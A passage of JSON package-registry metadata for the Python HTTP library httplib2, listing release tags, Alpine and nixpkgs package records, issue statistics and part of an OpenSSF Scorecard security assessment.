":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T19:59:47.191Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.22","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":118,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2025-06-08T15:31:52.529Z","updated_at":"2025-06-08T15:31:52.529Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.22","url":"https://pkgs.alpinelinux.org/packages?branch=v3.22","ecosystem":"alpine","default":false,"packages_count":26323,"maintainers_count":422,"namespaces_count":2,"keywords_count":4638,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1803},"icon_url":"https://github.com/alpinelinux.png","created_at":"2025-06-05T10:49:56.987Z","updated_at":"2026-08-24T05:06:25.345Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/namespaces"}},{"id":12865767,"name":"python313Packages.httplib2","ecosystem":"nixpkgs","description":"Comprehensive HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["python"],"namespace":null,"versions_count":2,"first_release_published_at":"2026-01-27T02:19:46.114Z","latest_release_published_at":"2026-03-07T01:24:06.714Z","latest_release_number":"0.31.1","last_synced_at":"2026-05-13T14:09:21.806Z","created_at":"2026-01-27T02:19:45.870Z","updated_at":"2026-08-21T20:13:50.957Z","registry_url":"https://search.nixos.org/packages?channel=unstable\u0026query=python313Packages.httplib2","install_command":"nix-env -iA nixpkgs.python313Packages.httplib2","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-unstable/pkgs/development/python-modules/httplib2/default.nix#L70","metadata":{"nix_attribute":"python3.13-httplib2-0.31.1","position":"pkgs/development/python-modules/httplib2/default.nix:70","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","aarch64-darwin","aarch64-windows","x86_64-windows","i686-windows","i686-freebsd","x86_64-freebsd","aarch64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"httplib2","upstream_purl":"pkg:pypi/httplib2"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using 